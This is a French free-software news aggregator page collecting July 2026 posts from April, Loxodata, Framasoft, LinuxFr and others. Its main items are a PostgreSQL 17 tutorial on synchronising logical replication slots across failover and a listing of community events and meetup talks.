L'Agenda du Libre

Logiciels, Arts, Données, Matériels, Contenus, Communs, Internet...

À proximité

Actualités des organisations

April

« Libre à vous ! » sur radio Cause Commune (7 juillet 2026)


France 🇫🇷
Publié le
lundi 06 juillet 2026 15h54
Importé le
lundi 06 juillet 2026 21h03
Start: 7 Juillet 2026 - 15:30End: 7 Juillet 2026 - 17:00

282e émission Libre à vous ! de l'April en direct sur radio Cause Commune 93.1 FM et DAB+ en Île-de-France, et sur le site web de la radio, mardi 7 juillet 2026 de 15 h 30 à 17 h. Le podcast de l'émission et les podcasts par sujets traités sont disponibles dès que possible, quelques jours après l'émission en général.

Au programme :

  • sujet principal : « Tactic, une ASBL Tip Top » (Association à but non lucratif)
  • la chronique Le truc que (presque) personne n'a vraiment compris mais qui nous concerne toutes et tous de Benjamin Bellamy : « 1984, c'est maintenant »
  • la chronique Que libérer d’autre que du logiciel avec Antanak, sur « Les assises de l’attention » (rediffusion du 10 février 2026)
  • quoi de Libre ? Actualités et annonces concernant l'April et le monde du Libre

Nous contacter pour poser une question :

Intervenir pendant le direct (mardi 7 juillet 2026 de 15 h 30 à 17 h 00) :

Écouter le direct mardi 7 juillet 2026 de 15 h 30 à 17 h 00   S'abonner au podcast S'abonner à la lettre d'actus

Les ambitions de l'émission Libre à vous !

La radio Cause commune a commencé à émettre fin 2017 sur la bande FM en région parisienne (93.1) et sur Internet. Sur le site de la radio on lit : « Radio associative et citoyenne, les missions de Cause Commune sont de fédérer toutes les initiatives autour du partage et de l’échange de savoirs, de cultures et de techniques ».

Nous avons alors proposé de tenir une émission April intitulée Libre à vous ! l'émission pour comprendre et agir avec l'April — d'explications et d'échanges concernant les dossiers politiques et juridiques que l'association traite et les actions qu'elle mène. Une partie de l'émission est également consacrée aux actualités et actions de type sensibilisation. L'émission Libre à vous ! est principalement animée par l'équipe salariée de l'April mais aussi par des membres bénévoles de l'association et des personnes invitées. Donner à chacun et chacune, de manière simple et accessible, les clefs pour comprendre les enjeux mais aussi proposer des moyens d'action, tel est l'objectif de cette émission hebdomadaire, qui est diffusée en direct chaque mardi du mois de 15 h 30 à 17 h.

Les archives de l'émission

Écouter les émissions précédentes

April

Revue de presse de l’April pour la semaine 27 de l’année 2026


France 🇫🇷
Publié le
lundi 06 juillet 2026 15h18
Importé le
lundi 06 juillet 2026 21h03

Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.

[Les Numeriques] “J'ai voulu créer une app gratuite, open source et respectueuse de la vie privée”: Saracroche, le logiciel qui veut mettre fin aux démarchages téléphoniquess

✍ Corentin Bechade, le jeudi 2 juillet 2026.

Né il y a un peu plus d’un an, Saracroche est rapidement devenu un phénomène en France. Pensée pour échapper au fléau des appels indésirables, l’app s’est taillé une excellente réputation au fil des mises à jour. Nous nous sommes entretenus avec Camille Bouvat, son développeur principal, pour savoir comment cette petite solution toulousaine a réussi à s’imposer comme une référence sur le marché.

[The Conversation] Abondance, rareté, open source: et si le débat sur l'IA se trompait d'étage?

✍ Bruno Deffains, le jeudi 2 juillet 2026.

Et si les performances affichées de l’IA générative cachaient un autre enjeu, celui du discernement. Et sur ce terrain, l’Europe possède des atouts certains.

[Goodtech] Conformité au CRA: l'écosystème open source se dote d'une formation gratuite

Le jeudi 2 juillet 2026.

À l’approche de l’échéance de septembre 2026 du Cyber Resilience Act, l’Eclipse Foundation lance l’ORC Learning Hub pour guider les développeurs.

[Le Monde Informatique] Comment l'Éducation nationale a construit le cloud Nuage pour le partage de fichiers

✍ Matthew Finnegan, le mercredi 1 juillet 2026.

Basée sur des briques open source comme Nextcloud, la plateforme Nuage donne aux agents du ministère la possibilité de stocker et partager leurs documents tout en conservant les données sur des infrastructures publiques.

[Numerama] Godot interdit le code généré par IA dans son moteur open source

✍ Amine Baba Aissa, le mercredi 1 juillet 2026.

Débordée par l’afflux de pull requests de faible qualité, la Fondation Godot, à l’origine du moteur de jeu vidéo open source et gratuit utilisé pour créer des jeux 2D et 3D, a décidé de durcir sa politique de contribution, allant jusqu’à bannir le code généré par des agents IA.

[ZDNET] Libre et open source express: Europe numérique, le pape et le Libre, communautés toxiques, Wikipédia

✍ Thierry Noisette, le mardi 30 juin 2026.

Revue de web: Pierre Baudracco (BlueMind) et Jean-Baptiste Kempf (VLC) parlent de l’Europe. Une référence aux logiciels libres dans l’encyclique de Léon XIV? Sexisme bien présent. Un cofondateur banni de Wikipédia.

[Silicon.fr] Comment l'UE se représente l'open source en France

✍ Clément Bohic, le lundi 29 juin 2026.

La Commission européenne a mis à jour son rapport sur l’état de l’open source en France. Voici quelques éléments ajoutés pour la période 2023-2026.

[ZDNET] La souveraineté numérique à l'ONU: au cœur de la dynamique mondiale pour remplacer les géants américains par des technologies open source

✍ Steven Vaughan-Nichols, le lundi 29 juin 2026.

La souveraineté numérique s’est imposée comme le thème central de la Semaine de l’open source des Nations unies de cette année, de nombreux participants estimant que l’open source constitue désormais une infrastructure essentielle et qu’on ne peut pas faire confiance aux entreprises américaines.

Et aussi:

[ZDNET] 'La mutualisation, ça marche à fond!' L'Adullact, le logiciel libre au service des collectivités

✍ Thierry Noisette, le dimanche 28 juin 2026.

L’association libriste des collectivités territoriales, née en 2002, est forte d’un demi-millier d’adhérents. Premier de deux retours sur son 10e congrès, à Montpellier.

Loxodata

Synchronisation des slots de réplication logique


Bourgogne-Franche-Comté 🇫🇷
Publié le
lundi 06 juillet 2026 13h00
Importé le
lundi 06 juillet 2026 21h04

À la suite de l’article sur l’intégration de la réplication logique dans Patroni, nous allons expliquer comme PostgreSQL permet, à partir de la version 17, la synchronisation des slots de réplication logique à travers les différents nœuds d’un ensemble de réplication physique.

Pour commencer, voici quelques rappels :

  • le flux de réplication logique permet de synchroniser les données de tables présentes dans le fournisseur de données, à partir d’une publication vers une souscription ;
  • ce flux utilise, par défaut, un slot de réplication : cet objet, présent côté publication, note la consommation des données de la souscription sous la forme d’un LSN (Log Sequence Number), soit une position dans les journaux de transactions.

En effet, un élément important lors de l’exploitation d’un flux de réplication logique est le slot qui est automatiquement créé côté publication : par défaut, lorsque l’instance PostgreSQL contenant cette publication subit une défaillance et qu’il est nécessaire de remplacer cette instance par un de ses réplicas, apparait alors un gros problème pour notre réplication logique : le slot n’existe tout simplement pas sur cette nouvelle instance primaire, et il est impossible de savoir si les données de notre flux de réplication logique sont correctement synchronisées entre la publication et la souscription. La seule méthode fiable est alors de tout resynchroniser, ce qui est trop couteux dans bien des cas.

Pour corriger ce manquement, l’extension pg_failover_slots est disponible à partir de 2023, mais, dès la version 17 de PostgreSQL, publiée à la fin de l’année 2024, la fonctionnalité de synchronisation des slots est intégrée dans PostgreSQL.

L’idée de cette fonctionnalité est simplement de faire en sorte que le slot créé lors de la création d’une souscription de la réplication logique soit présent et à jour sur tous les réplicas de l’instance primaire où est créée cette souscription.

Dans cet article, pour illustrer ce fonctionnement et détailler les différents éléments de cette mise en place, nous utilisons un ensemble d’instances PostgreSQL : une instance primaire et deux instances secondaires, contenant une publication, puis une instance distincte dans laquelle nous créons la souscription de la réplication logique.

Le diagramme suivant représente les instances et les différents flux entre ces instances :

Les instances sont hébergées dans des systèmes Debian nommés comme suit :

  • pg17ph1, pg17ph2 et pg17ph3 : systèmes hébergeant la publication dans un ensemble d’instances en réplication physique ;
  • pg17lg1 : système hébergeant la souscription.

La première étape est la mise en place de l’ensemble d’instances PostgreSQL en réplication physique, avec un paramétrage rendant possible la synchronisation des slots. En effet, cette synchronisation utilise le flux de réplication physique, cela implique donc un paramétrage un peu plus exigeant que celui par défaut pour une réplication. Les paramètres sont modifiés dans les trois instances, même si certains d’entre eux ne sont utiles que dans une instance secondaire, et c’est important, car les rôles des trois instances changent au cours du temps, et ce paramétrage est donc utile à un moment sur chacun des nœuds.

Un point critique est la possibilité d’ordonnancer la synchronisation des slots : par défaut, les slots physiques et logiques avancent indépendamment les uns des autres, de telle sorte qu’il est possible que le slot de la réplication logique soit en avance sur les slots de la réplication physique. Dans ce cas, le problème apparaitra lors d’une bascule : si le nœud promu est en retard, alors la réplication logique ne pourra reprendre et sera désynchronisée.

Création d’une structure de données

Pour cet article, nous allons utiliser une structure de données minimale : une base de données, une table, et quelques lignes insérées suffiront à démontrer la faisabilité du sujet de cet article.

La base de données contient aussi la publication de la réplication logique et le slot correspondant. Cette base de données est aussi utilisée pour la connexion des réplications physiques, car c’est par cet intermédiaire que la synchronisation du slot de réplication logique se fait.

CREATE DATABASE lambdadb;

Il est aussi nécessaire de créer des rôles spécifiques à la réplication :

CREATE ROLE replirol LOGIN REPLICATION; CREATE ROLE mlreplrol LOGIN REPLICATION;

Les mots de passe ne sont pas créés dans cet exemple, pas plus que les entrées dans le fichier pg_hba.conf, même s’il s’agit d’une étape nécessaire.

La table créée est la suivante :

CREATE TABLE public.lambda ( id integer GENERATED BY DEFAULT AS IDENTITY, ev timestamptz default now(), d text, r double precision ); GRANT SELECT ON TABLE public.lambda TO mlreplrol ; INSERT INTO public.lambda ( d, r ) VALUES ('a', 1.0), ('b', 1.33) ;

Configuration des instances PostgreSQL

Les trois instances sont configurées de la même manière, car elles peuvent toutes, à leur tour, avoir les rôles primaires ou secondaires, et il est préférable d’avoir le moins de choses à faire lors des changements de rôle.

Configuration du rôle « primaire »

Le premier paramètre à modifier est nécessaire pour autoriser la réplication logique, avec ou sans synchronisation des slots :

  • wal_level = logical

Le second paramètre concerne la synchronisation proprement dite, qui est permise avec le paramètre suivant :

  • sync_replication_slots = on

Les slots doivent être créés avec l’appel de la fonction pg_create_physical_replication_slot(), dans chacune des instances PostgreSQL, en utilisant les noms de slots ci-dessus, par exemple :

select pg_create_physical_replication_slot('pg17ph2_slot'); select pg_create_physical_replication_slot('pg17ph3_slot');

Dans une instance primaire, la configuration minimale doit alors être :

wal_level = logical sync_replication_slots = on

Configuration du rôle « secondaire »

Ensuite, les instances secondaires doivent être en mesure de se connecter à l’instance primaire, en utilisant la base de données créée pour lire l’état du slot de réplication logique et en déclarant le slot de réplication physique à utiliser, par exemple :

primary_conninfo = 'host=pg17ph1 port=5432 user=replirol dbname=lambdadb' primary_slot_name = 'pg17ph2_slot'

Le nom d’hôte de la connexion de réplication doit être adapté en fonction de l’état du cluster de réplication physique, en utilisant l’hôte primaire.

De plus, il est nécessaire d’indiquer le nom du slot de réplication physique permettant la synchronisation, par exemple :

primary_slot_name = 'pg17ph2_slot'

Enfin, la boucle de retour est nécessaire, pour que l’instance primaire obtienne la confirmation de la réplication de l’état du slot :

hot_standby_feedback = on

En résumé, la configuration des instances pg17ph2 et pg17ph3 est la suivante :

  • pg17ph2 :
wal_level = logical sync_replication_slots = on primary_conninfo = 'host=pg17ph1 port=5432 user=replirol dbname=lambdadb' primary_slot_name = 'pg17ph2_slot' hot_standby_feedback = on
  • pg17ph3 :
wal_level = logical sync_replication_slots = on primary_conninfo = 'host=pg17ph1 port=5432 user=replirol dbname=lambdadb' primary_slot_name = 'pg17ph3_slot' hot_standby_feedback = on

Mise en place de la réplication physique

La création des instances secondaires peut se faire avec la commande pg_basebackup :

pg_basebackup -h pg17ph1 -X stream -U replirol -D 17/main/

Dans cet exemple, l’option -R n’est pas utilisée, car le paramètre primary_conninfo est déjà réglé précédemment, et son utilisation ici surchargerait la valeur dans le fichier postgresql.auto.conf, ce qui amènerait une ambiguïté voire un dysfonctionnement.

Par contre, il est nécessaire de créer le fichier standby.signal pour chacune des instances secondaires :

touch $PGDATA/standby.signal

Création des slots de réplication

Dans la prévision d’une bascule, les slots de réplication physique peuvent être provisionnés sur les deux replicas :

  • Dans l’instance pg17ph2 :
select pg_create_physical_replication_slot('pg17ph2_slot'); select pg_create_physical_replication_slot('pg17ph3_slot');
  • Dans l’instance pg17ph3 :
select pg_create_physical_replication_slot('pg17ph1_slot'); select pg_create_physical_replication_slot('pg17ph2_slot');

Création de la réplication logique

Enfin, la publication, qui permet la réplication logique, se fait dans l’instance primaire, depuis la base de données lambdadb où est présente la table :

CREATE PUBLICATION lambda_pub WITH (publish = 'insert, update, delete, truncate'); ALTER PUBLICATION lambda_pub ADD TABLE ONLY public.lambda;

Puis, dans l’instance créée pour recevoir les données de la réplication logique, on crée la souscription, dont la chaîne de connexion doit permettre de suivre le slot :

CREATE SUBSCRIPTION lambda_sub_01 CONNECTION 'host=pg17ph1,pg17ph2,pg17ph3 user=mlreplrol dbname=lambdadb target_session_attrs=primary' PUBLICATION lambda_pub WITH ( slot_name = 'lambda_sub_01_slot' , failover = true) ;

La réplication fonctionne, après la synchronisation initiale, et les données de la table sont visibles dans cette instance, comme le montre la requête suivante :

psql -h pg17lg1 -d lambdadb -c "SELECT * from lambda ORDER BY id ASC" id | ev | d | r ----+-------------------------------+---+------- 1 | 2027-07-06 08:57:23.917987+00 | a | 1 2 | 2027-07-06 08:57:23.917987+00 | b | 1.33 (2 rows)

Vérification de la synchronisation du slot

En fonction des écritures, la réplication avance, c’est-à-dire que le LSN, qui désigne la position courante dans les journaux de transactions, est incrémenté. Cette donnée est visible dans la vue pg_replication_slots, et pour vérifier que le slot de réplication logique est correctement synchronisé, il est possible de consulter cette vue sur les trois instances concernées :

for host in `seq 1 3`; do psql -X -h "pg17ph${host}" -U postgres <<EOF select 'pg17ph${host}' as host_name, slot_name, active , restart_lsn, confirmed_flush_lsn, failover, synced from pg_replication_slots where slot_name='lambda_sub_01_slot' EOF done host_name | slot_name | active | restart_lsn | confirmed_flush_lsn | failover | synced -----------+--------------------+--------+-------------+---------------------+----------+-------- pg17ph1 | lambda_sub_01_slot | t | 0/3FD9A58 | 0/3FD9A90 | t | f host_name | slot_name | active | restart_lsn | confirmed_flush_lsn | failover | synced -----------+--------------------+--------+-------------+---------------------+----------+-------- pg17ph2 | lambda_sub_01_slot | f | 0/3FD9A58 | 0/3FD9A90 | t | t host_name | slot_name | active | restart_lsn | confirmed_flush_lsn | failover | synced -----------+--------------------+--------+-------------+---------------------+----------+-------- pg17ph3 | lambda_sub_01_slot | f | 0/3FD9A58 | 0/3FD9A90 | t | t

On peut voir que les booléens failover sont tous vrais, et que sur les instances secondaires, les booléens synced sont vrais aussi.

Les positions LSN sont les mêmes partout : le slot est correctement synchronisé.

Bascule des instances physiques

Vient le moment fatidique : la perte de l’instance primaire, dans notre cas, pg17ph1 !

Dans ce cas, il faut promouvoir une des instances secondaires, par exemple :

psql -h pg17ph2 -d lambdadb -c "SELECT pg_promote()"

Puis reconfigurer la réplication physique de la troisième instance pour qu’elle reprenne, et avec elle la synchronisation du slot de réplication logique.

Une fois ces modifications apportées, la réplication logique doit alors suivre automatiquement, comme on peut le voir dans le log suivant, extrait de l’instance pg17lg1 :

2027-07-06 09:11:18.326 UTC [15559] LOG: data stream from publisher has ended 2027-07-06 09:11:18.326 UTC [15559] ERROR: could not send end-of-streaming message to primary: SSL connection has been closed unexpectedly no COPY in progress 2027-07-06 09:11:18.336 UTC [16954] LOG: logical replication apply worker for subscription "lambda_sub_01" has started 2027-07-06 09:11:18.337 UTC [123] LOG: background worker "logical replication apply worker" (PID 15559) exited with exit code 1 2027-07-06 09:11:18.383 UTC [16954] ERROR: could not connect to the publisher: connection to server at "pg17ph1" (fc42:5009:ba4b:5ab0:1266:6aff:fef7:97), port 5432 failed: FATAL: the database system is shutting down connection to server at "pg17ph2" (fc42:5009:ba4b:5ab0:1266:6aff:fec6:6133), port 5432 failed: server is in hot standby mode connection to server at "pg17ph3" (fc42:5009:ba4b:5ab0:1266:6aff:fe75:3d43), port 5432 failed: server is in hot standby mode 2027-07-06 09:11:18.385 UTC [123] LOG: background worker "logical replication apply worker" (PID 16954) exited with exit code 1 2027-07-06 09:11:23.338 UTC [16956] LOG: logical replication apply worker for subscription "lambda_sub_01" has started

Il est toutefois nécessaire de contrôler le fonctionnement :

  • les modifications des données parviennent-elles jusqu’à la table présente dans pg17lg1 ?
  • le slot est-il correctement synchronisé entre les deux instances de réplication physiques restantes ?

Si oui, alors l’objectif est atteint, la synchronisation fonctionne et est utilisable !

Conclusion

Cette synchronisation apparait nécessaire pour que la réplication logique survive à un incident sur l’instance physique, ce qui ne manquera pas d’arriver. Mais ce besoin impose un paramétrage particulier des instances PostgreSQL, l’utilisation de slot de réplication physique et de la boucle de feedback, ce qui n’est pas gratuit.

Dans tous les cas, la réplication logique répond à des besoins d’architecture auxquels ne répond pas la réplication physique, et est parfois nécessaire. Il convient de mettre en place les sécurités qui permettent une continuité de service, et la synchronisation du slot de réplication logique en est une.

Malgré cela, cet ensemble de configuration reste imparfait : lorsque la réplication logique est en avance sur la réplication physique, alors les slots synchronisés seront eux aussi en retard sur la publication, ce qui nécessite une réinitialisation de celle-ci.

Mais il existe une solution que nous verrons dans un prochain article.

OpenStreetMap France

OpenStreetMap rend nos infrastructures plus intelligentes et durables


Île-de-France 🇫🇷
Publié le
lundi 06 juillet 2026 12h14
Importé le
lundi 06 juillet 2026 13h03

OpenStreetMap produit et organise de nombreuses données utiles à la gestion des infrastructures et des services publics

L’article OpenStreetMap rend nos infrastructures plus intelligentes et durables est apparu en premier sur OpenStreetMap France.

LinuxFr

🪶 Les journaux LinuxFr.org les mieux notés de juin 2026


Internet
Publié le
lundi 06 juillet 2026 11h10
Importé le
lundi 06 juillet 2026 13h03

LinuxFr.org propose des dépêches et articles, soumis par tout un chacun, puis revus et corrigés par l’équipe de modération avant publication. C’est la partie la plus visible de LinuxFr.org, ce sont les dépêches qui sont le plus lues et suivies, sur le site, via Atom/RSS, ou bien via partage par messagerie instantanée, par courriel, ou encore via médias sociaux.

Ce que l’on sait moins, c’est que LinuxFr.org vous propose également de publier directement vos propres articles, sans validation a priori de lʼéquipe de modération. Ceux-ci s’appellent des journaux. Voici un florilège d’une dizaine de ces journaux parmi les mieux notés par les utilisateurs et les utilisatrices… qui notent. Lumière sur ceux du mois de juin passé.

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

Commission Open Source de Telecom Valley

Pour sa 4ème édition, l’Azur Tech Summer s’impose comme le pilier de haut niveau de l’acculturation et de la formation aux nouveaux usages du numérique


Provence-Alpes-Côte d'Azur 🇫🇷
Publié le
lundi 06 juillet 2026 10h01
Importé le
lundi 06 juillet 2026 13h04

L’article Pour sa 4ème édition, l’Azur Tech Summer s’impose comme le pilier de haut niveau de l’acculturation et de la formation aux nouveaux usages du numérique est apparu en premier sur Telecom Valley.

Framasoft

UPLOAD dans un recueil de nouvelles solarpunk


France 🇫🇷
Publié le
lundi 06 juillet 2026 09h03
Importé le
lundi 06 juillet 2026 13h03
Cela fait plusieurs années que Framasoft participe à des ateliers d’écriture solarpunk dans le cadre d’une Activité Pédagogique d’Intersemestre à l’Université de Technologie de Compiègne (voir l’annonce originelle publiée en 2024). À chaque fin de session, les étudiantes et étudiants … Lire la suite­­
Framasoft

Khrys’presso du lundi 6 juillet 2026


France 🇫🇷
Publié le
lundi 06 juillet 2026 07h42
Importé le
lundi 06 juillet 2026 13h03
Comme chaque lundi, un coup d’œil dans le rétroviseur pour découvrir les informations que vous avez peut-être ratées la semaine dernière. Tous les liens listés ci-dessous sont a priori accessibles librement. Si ce n’est pas le cas, pensez à activer … Lire la suite­­
Infini

Journées du Logiciel Libre 2026


Bretagne 🇫🇷
Publié le
lundi 06 juillet 2026 07h19
Importé le
lundi 06 juillet 2026 13h03

Lieu de rencontre bouillonnant depuis 1998, les Journées du Logiciel Libre accueillent à Lyon le temps d'un week-end plus d'un millier de curieuses et curieux de tous bords. Qu'importe son niveau, on peut venir pour apprendre, s'initier, partager ses idées, construire ses projets et rêver ensemble à des lendemains plus libres. Après quelques années d'absence, Infini était de retour à cet événement en 2026.
L'édition 2026 des JdLL a eu lieu les 30 et 31 mai à l'école normale supérieure de (…)

- Actualités
Zoomacom

Au Sénat, représenter la voix des territoires face aux cyberviolences


Auvergne-Rhône-Alpes 🇫🇷
Publié le
lundi 06 juillet 2026 07h00
Importé le
lundi 06 juillet 2026 13h03
La Grande enquête sur les cyberviolences sexistes et sexuelles Le 22 juin dernier, les associations Point de Contact,  Féministes contre...
Nubo

Update van onze diensten


Bruxelles 🇧🇪
Publié le
lundi 06 juillet 2026 02h00
Importé le
lundi 06 juillet 2026 13h05

Attention ! Mardi prochain, le 7 juillet, en début de soirée, les services cloud et de messagerie seront brièvement interrompus, pendant environ 20 minutes chacun. Pendant ce temps, nous procéderons à une mise à jour de Nextcloud et de Roundcube. En principe, tout fonctionnera à nouveau normalement par la suite, mais si vous avez des questions ou si vous rencontrez des problèmes, n’hésitez pas à nous contacter comme d’habitude à l’adresse hello@team.nubo.coop.

LinuxFr

Agenda du Libre pour la semaine 28 de l'année 2026


Internet
Publié le
dimanche 05 juillet 2026 11h50
Importé le
dimanche 05 juillet 2026 13h03

Calendrier Web, regroupant des événements liés au Libre (logiciel, salon, atelier, install party, conférence), annoncés par leurs organisateurs. Voici un récapitulatif de la semaine à venir. Le détail de chacun de ces 30 événements (France: 25, Belgique: 2, Internet: 2, Québec: 1) est en seconde partie de dépêche.

Sommaire

[FR Saint Clar] Tous les Lundis, médiatheque de Saint Clar – Le lundi 6 juillet 2026 de 10h00 à 17h00.

Tous les lundis de 10h à 17h sans interruption, l’association Prends-toi en main / atelier abcpc, propose install party, suivi, dépannage, formation et revalorisation à petit prix sous Linux exclusivement.

L’atelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.

[FR Saint-Étienne] Permanence de l’association Alolise – Le lundi 6 juillet 2026 de 19h00 à 22h00.

Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.

Rencontrer les bénévoles, poser des questions sur le libre ou l’informatique, les logiciels, l’hébergement, passer de Windows à Linux.

Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.

[FR Sainte-Hélène] Cours gratuits d’Espéranto + Visio – Le lundi 6 juillet 2026 de 19h30 à 21h30.

Saluton,

Je vous propose des cours d’espéranto gratuits qui débuteront le lundi 8 juin à Sainte-Hélène dans le Médoc et qui sera également disponible en visioconférence.
Le cours est destiné aux apprenants francophones de France et d’ailleurs.

L’espéranto est plus qu’une langue neutre et très facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilités d’hébergement ou de fraterniser avec des personnes du monde entier.
Vous trouverez plus d’informations sur la page Wikipédia, le site Espéranto-Gironde ou en visualisant le documentaire "ESPÉRANTO: de la genèse à la conquête de l’Europe"

Les cours ont lieu le lundi soir de 19h30 à 21h30 sur environ 10 soirs pour réaliser les 10 leçons. Ces leçons complèteront les cours papier ou d’application telle que Duolingo.
Début: lundi 8 juin 2026.
Les cours sont GRATUITS pour tous.

Le cours est en présentiel à Sainte-Hélène (33480) au foyer des sociétés en collaboration avec l’association l’Écurieux, ainsi qu’en distanciel / visioconférence.
Ce cours est gratuit pour tous, en présentiel ou en distanciel.

Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque… afin de pratiquer en situation réelle.

N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) pour plus d’informations ou pour vous inscrire.

Vivu Esperanto kaj Ĝis la revido.

[FR Saint-Herblain] Repair Café numérique + Install Party – Le mardi 7 juillet 2026 de 14h00 à 17h00.

Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

Marre de Windows et envie d’un peu de liberté, venez le libérer!

[FR Dijon] Atelier du mardi – Le mardi 7 juillet 2026 de 15h00 à 19h00.

Présentation de différents outils concernant les logiciels libres.

Assistance technique.

De préférence sur RDV directement sur le site de l’asso

[CA-QC Montréal] Rencontres Linux au Québec – Le mardi 7 juillet 2026 de 17h00 à 21h30.

Local de la rencontre: École de Technologie Supérieure local B-0904
Rencontre virtuelle: Suivez le lien sur la page de l’événement

17:00 à 19:00 – 5 à 7 virtuel et en présentiel

Rejoignez-nous pour un moment de détente et de convivialité lors de notre 5 à 7. Que vous préfériez nous retrouver au Resto-Pub 100 Génies de l’ÉTS ou en ligne sur BigBlueButton (BBB), l’essentiel est de partager un moment agréable. Si vous avez l’intention de venir en personne, veuillez nous en informer afin de pouvoir réserver suffisamment de place pour vous.

18:30 à 19:00 – Installation et tests de l’environnement hybride (tests de son et vidéo)

Nous assurerons que l’environnement hybride soit parfaitement opérationnel en effectuant des tests de son et de vidéo.

19:00 à 21:30 – Programmation de la rencontre

  1. Accueil et mot de bienvenue Martial Bigras
  2. Capsule éducative: L’objection-sociocratique comme core de gouvernance léger pour les petites communautés open source. Par Jérémy Viau-Trudel

Jérémy viendra vulgariser et partager le résultat de 27 ans en recherche-action sur les communautés de pratiques ouvertes, de développement libre et open source.

Pas de blabla inutile: un format court, dense et accessible pour comprendre les clés d’une gouvernance collaborative efficace.

Une courte présentation inspirante à ne pas manquer pour tous les passionnés de l’écosystème libre. 🐧

A propos de Jérémy Viau-Trudel

Ayant une trajectoire atypique, Jérémy Viau-Trudelvient de la chimie quantique. Pendant ses études supérieures à l’Université Laval, puis à l’Université Paris-Sud, il a mené des recherches de haut niveau sur la simulation de la dynamique électronique de molécules soumises à des champs laser intenses. C’est là, d’abord par nécessité, qu’il a commencé à utiliser Linux. Depuis une dizaine d’années, il est consultant TI spécialisé en Linux et intervient régulièrement sur des mandats DevSecOps. Son approche pragmatique l’a amené à travailler aussi bien sur des infrastructures on-premise qu’en infonuagique et en edge computing.

  1. Présentations

Présentation 1: La portée de la souveraineté: How far can we go ? par Alex Blackie

[Présentation en anglais]

La souveraineté numérique ne se résume pas à héberger ses serveurs localement. Derrière chaque application se cache une chaîne complète de dépendances: code source, plateformes de développement, infrastructures infonuagiques, matériel, réseaux et fournisseurs de services.

Lors de cette présentation, Alex Blackie proposera une réflexion sur les limites et les possibilités d’une véritable souveraineté technologique. Est-il réaliste de construire une chaîne d’approvisionnement entièrement nationale, du développement logiciel jusqu’à l’infrastructure physique ? Quels compromis faut-il accepter, et quels bénéfices peut-on en retirer ?

Cette présentation s’adresse aux développeurs, administrateurs systèmes, professionnels des infrastructures ainsi qu’à toute personne intéressée par les enjeux de souveraineté numérique, de logiciel libre et d’infonuagique.

À propos du présentateur
Alex Blackieest développeur logiciel, administrateur systèmes et réseaux, ainsi qu’entrepreneur. Fort de plus de quinze années d’expérience dans l’industrie des technologies de l’information, il s’intéresse depuis longtemps aux enjeux de souveraineté numérique et aux infrastructures ouvertes.

Il est le fondateur de BlackieOps, l’entreprise derrière Worktree, une plateforme canadienne de développement collaboratif et une alternative à GitHub, accompagnée d’une offre infonuagique axée sur les besoins des organisations canadiennes. À travers ses projets, Alex œuvre à bâtir des solutions technologiques ouvertes qui redonnent aux organisations un meilleur contrôle sur leurs données et leurs infrastructures.

Présentation 2 – ACRA: une suite logicielle libre d’observabilité pour la sécurité de nos infrastructures sur site et infonuagiques par Kitio Fofack

Les infrastructures informatiques modernes sont de plus en plus complexes, réparties entre serveurs sur site, environnements virtualisés, conteneurs et services infonuagiques. Dans ce contexte, disposer d’une visibilité complète sur l’état de ses systèmes est devenu essentiel pour assurer leur performance, leur fiabilité et leur sécurité.

Lors de cette présentation, Kitio Fofack nous fera découvrir ACRA, une suite logicielle libre d’observabilité conçue pour surveiller et protéger les infrastructures informatiques. Nous explorerons comment la collecte et l’analyse des métriques, journaux et événements permettent de détecter rapidement les anomalies, d’améliorer la résilience des systèmes et de renforcer la posture de sécurité des organisations.

Cette présentation s’adresse aux administrateurs systèmes, professionnels DevOps, spécialistes de la cybersécurité ainsi qu’à toute personne intéressée par les solutions libres de surveillance et d’observabilité. Des exemples concrets permettront d’illustrer comment ACRA peut être déployé aussi bien dans des environnements sur site que dans des infrastructures infonuagiques.

À propos du présentateur:

Fondateur/Représentant de l’IREX et Conférencier international

Pionnier et évangéliste des communs numériques, j’œuvre pour la réappropriation des technologies à des fins sociétales. À travers l’Institut du Retour d’Expérience (IREX), je développe des infrastructures libres conçues comme les fondations d’un modèle économique plus équitable. De la souveraineté alimentaire en agriculture biologique à la pérennité de notre système de santé, en passant par la création d’emplois locaux non délocalisables, je démontre que le logiciel libre est une réponse directe aux crises contemporaines. Reconnu pour cet engagement, j’ai été invité à présenter cette interconnexion entre technologies ouvertes et objectifs de développement durable lors des prestigieux UN Open Source Days 2025.

Présentation 3 – Sécurisation des variables d’environnement et souveraineté: l’approche KeyHarbour par Denis Fabien et Étienne Morency

La sécurité d’une application ne dépend pas uniquement de la qualité de son code. Les variables d’environnement, clés d’API, mots de passe et autres secrets utilisés en production représentent souvent une surface d’attaque sous-estimée. Comment protéger efficacement ces informations sensibles tout en facilitant le travail des équipes de développement et d’exploitation ?

Lors de cette présentation, Denis Fabien et Étienne Morency nous feront découvrir KeyHarbour, une solution souveraine basée sur des standards ouverts permettant d’éliminer le stockage statique des secrets dans les fichiers de configuration. Nous verrons comment l’injection dynamique de secrets peut améliorer la sécurité, réduire les risques d’exposition et renforcer la traçabilité des accès aux informations sensibles.

Cette présentation s’adresse particulièrement aux administrateurs systèmes, spécialistes DevOps, responsables de la sécurité et équipes d’infrastructure qui souhaitent offrir aux développeurs un environnement à la fois plus sécuritaire, plus simple à gérer et mieux adapté aux exigences des infrastructures modernes.

À propos des présentateurs: Denis Fabien est consultant et coach DevOps auprès de grandes entreprises. Depuis le début de sa carrière, il a évolué entre le développement logiciel et l’administration de systèmes (notamment Linux).Cette double expertise l’a naturellement conduit vers le DevOps, et plus particulièrement vers l’automatisation des déploiements et la gestion des infrastructures. Il est également responsable des partenariats chez KeyHarbour.

